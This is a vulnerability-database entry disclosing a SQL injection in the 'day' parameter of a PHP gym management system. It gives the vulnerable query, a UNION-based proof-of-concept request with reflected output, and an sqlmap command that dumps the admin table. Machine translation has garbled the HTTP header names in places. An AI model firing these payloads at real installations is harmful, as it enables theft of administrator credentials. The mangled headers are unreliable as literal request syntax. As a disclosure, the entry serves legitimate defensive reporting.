| タイトル | Code-projects Gym Management System In PHP 1.0 SQL injection |
|---|
| 説明 | # PHP中的健身房管理系统在函数中存在SQL注入漏洞/functions.php:31-57
## 供应商
https://code-projects.org/gym-management-system-in-php-with-source-code/
## 漏洞文件
功能/functions.php:31-57
## 描述一下
functions.php,
**代码分析**
```
if(isset($_GET['day']))){
$day_id=$_GET['day'];
$get_exer=“SELECT * FROM exercises WHERE day_id='$day_id'”;
$run_exer=mysqli_query($db, $get_exer);
...
}
```
“$_GET['day']' 直接连接到查询条件中,无需任何整数转换或参数化。同时,查询结果直接渲染在页面上,因此该点不仅可注入,还具备明显的回声能力。
## 有色人种
```
GET /mygym/index.php?day=-1'%20UNION%20SELECT%20999,'SQLI_MARK','9',1,'Bench%20Press.jpg',1%20--%20- HTTP/1.1
主机:127.0.0.1
```
发送此请求,攻击者制作的内容成功出现在回复中:
```
<h3 style='color:#f2e013;'>SQLI_MARK</h3>
...
<h3 style='color:#e0d126;'>9组/h3组<>
```
这表明注入的数据参与了页面渲染,构成了基于UNION的反射SQL注入,可以被可靠利用。
## 漏洞
成功登录后,用 cookies 测试参数“day”
```
获取 /mygym/index.php?day=1 HTTP/1.1
主持人:192.168.10.101
升级-不安全-请求:1
用户代理:Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36 (KHTML,类似Gecko) Chrome/x.x.x.x Safari/537.36
接受:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
推荐人:http://192.168.10.101/mygym/index.php
接受编码:gzip,放气
接受-语言:zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=l4um1e5q16imve2acta7tntl6l
连接:接近
```
```
sqlmap -r 1.txt --level 5 -o --batch -D myGym -T admin --dump
```
成功注入了管理员的账户和密码。 |
|---|
| ソース | ⚠️ https://github.com/QAp89/CVE/blob/main/SQL1.md |
|---|
| ユーザー | HSEC (UID 97444) |
|---|
| 送信 | 2026年04月17日 16:16 (2 月 ago) |
|---|
| モデレーション | 2026年05月03日 10:03 (16 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 360892 [code-projects Gym Management System In PHP/Windows NT 1.0 /index.php 日 SQLインジェクション] |
|---|
| ポイント | 20 |
|---|